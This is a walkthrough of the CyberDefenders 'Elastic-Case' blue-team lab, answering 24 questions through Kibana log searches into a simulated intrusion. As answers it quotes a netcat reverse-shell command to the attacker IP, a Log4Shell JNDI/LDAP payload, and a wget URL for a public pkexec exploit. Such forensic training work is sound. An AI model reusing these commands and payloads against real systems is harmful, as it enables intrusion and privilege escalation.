Elastic-Case

An attacker was able to trick an employee into downloading a suspicious file and running it. The attacker compromised the system, along with that, The Security Team did not update most systems....

Elastic-Case blueteam challenge.CyberDefenders

After Downloading the file we have to unzip it and then open using Vmware (I faced a problem when trying to open it by Vmware workstation pro 17 ) so I opened it using Virtual Box.

it will ask you for the username/password it is: elastic/elastic.

wait for a minute then access Kibana from the host machine via http://127.0.0.1:5601

Now all is ready.

Q1 Who downloads the malicious file which has a double extension?

for this question I tried to search for http requests "get" but there is nothing,

tried to filter with file.name : *.*.* but there was 23.000 event.

then tried to search in the Security alerts, and here it is I found many alerts about files.

so I tried to filter it by using the filter : file.name : *.*.*

and I found that there are files ending with .pdf.exe (cybery - Ahmed)

from the timeline the first alert is made from Ahmed then cybery open the file again

Answer: Ahmed

Q2 What is the hostname he was using?

from the previous screen, it is DESKTOP-Q1SL9P2

Aswer: DESKTOP-Q1SL9P2

Q3 What is the name of the malicious file?

from the previous screen,

Answer :Acount_details.pdf.exe

Q4 What is the attacker's IP address?

from the previous screen, click analyze event, then from the network find the destination address:192.168.1.10

Answer: 192.168.1.10

Q5 Another user with high privilege runs the same malicious file. What is the username?

From the anwers of Q1, he is cybery

Answer: cybery

Q6 The attacker was able to upload a DLL file of size 8704. What is the file name?

filter with the mentioned size and file name with extention .dll with the following filter:

Answer: mCblHDgWP.dll

Q7 What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

filter with the pid and winlogs by the following filter :

winlog.user.domain : "NT AUTHORITY" and process.pid : 10716

then go to process.parent.name from the left panel: there is cmd.exe and rundll32.exe

after some investigation the cmd.exe opened rundell32.exe then it opened a cmd.exe with more privileges.

I found it when I tried to look at the alerts.

so the process with pid 10716 is cmd.exe and its parent is rundll32.exe

Answer: rundll32.exe

Q8 The previous process was able to access a registry. What is the full path of the registry?

filter with the process by the following filter :

process.name : "rundll32.exe"

then go to the registry key from the left panel.

Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

Q9 PowerShell process with pid 8836 changed a file in the system. What was that filename?

let us filter with the process by the following filter :

process.pid : 8836 and event.action : "overwrite"

here it is, look at the file name and find the answer.

Answer: ModuleAnalysisCache

Q10 PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

we have pid ,file extension and the action type, so we could find it easily by making the following filter :

process.pid : 11676 and event.action : "creation" and file.name : *.ps1

now look at the tine and answer is in this packet .

Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1

Q11 What is the machine's IP address that is in the same LAN as a windows machine?

from Security go to Network then filter host.os.name : "Windows"

so that is the mentioned ip :192.168.10.10 and the needed ip must include : 192.168.10.(2:254) as it in the same LAN

After some investigations of the ips there is a suitable ip:192.168.10.30

Answer: 192.168.10.30

from Security>Hosts scroll down theen select Ubuntu .

now look at the Authentications, Salem is the last successful try for the attacker.

Answer: Salem

Q13 After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?

ok, we have a tool: wget , the attacker user name : Salem, and have to find the URL

from the prevoius screen

so I tried to find it by looking at the user activity and here it is.

Answer: https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

Q14 After The attacker runs the exploit, which spawns a new process called pkexec, what is the process's md5 hash?

again make a filter to find a process with name: pkexec and the user was Salem as following :

process.name : pkexec and group.name : "salem"

Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6

Q15 Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?

we have the process pid :3011 and the user name: root so make a filter

process.pid : 3011 and user.name : root

finally go to process.command_line from the left.

Answer: bash -i

Q16 What is the hostname which alert signal.rule.name: "Netcat Network Activity"?

for this question let us investigate at the Security tab - alerts ,then filter with the foloowing filter :

signal.rule.name : "Netcat Network Activity"

Answer: centOS

Q17 What is the username who ran netcat?

from the previous screenshot, it is solr

Answer: solr

Q18 What is the parent process name of netcat?

from the same screen let us make more deep investigation by selecting "Analyze event"

Answer: Java

Q19 If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?

from the analyst tab make a filter by the process name , and look at the results process parents command line

Answer: nc -e /bin/bash 192.168.1.10 9999

Q20 From the previous three questions, you may remember a famous java vulnerability. What is it?

Answer: Log4Shell

Q21 What is the entire log file path of the "solr" application?

filter for the user solr then look at the file path at the left panel

Answer: /var/solr/logs/solr.log

Q22 What is the path that is vulnerable to log4j?

I filtered many times with the captured files till find the answer :

go to filebeat-* , filter : log.file.path : solr

Answer: /admin/cores

Q23 What is the GET request parameter used to deliver log4j payload?

Actually, I used google to know the payload and found that ..

so i tried to filter with the payload to be sure that is the answer .

yes, that is right.

Answer: foo

Q24 What is the JNDI payload that is connected to the LDAP port?

from the previous screen.

Answer: {foo=${jndi:ldap://192.168.1.10:1389/Exploit}}

Hope this writeup helped you, for questions feel free to message me.

Thank you

PreviousDetectLog4j NextPacketDetective

Last updated 2 years ago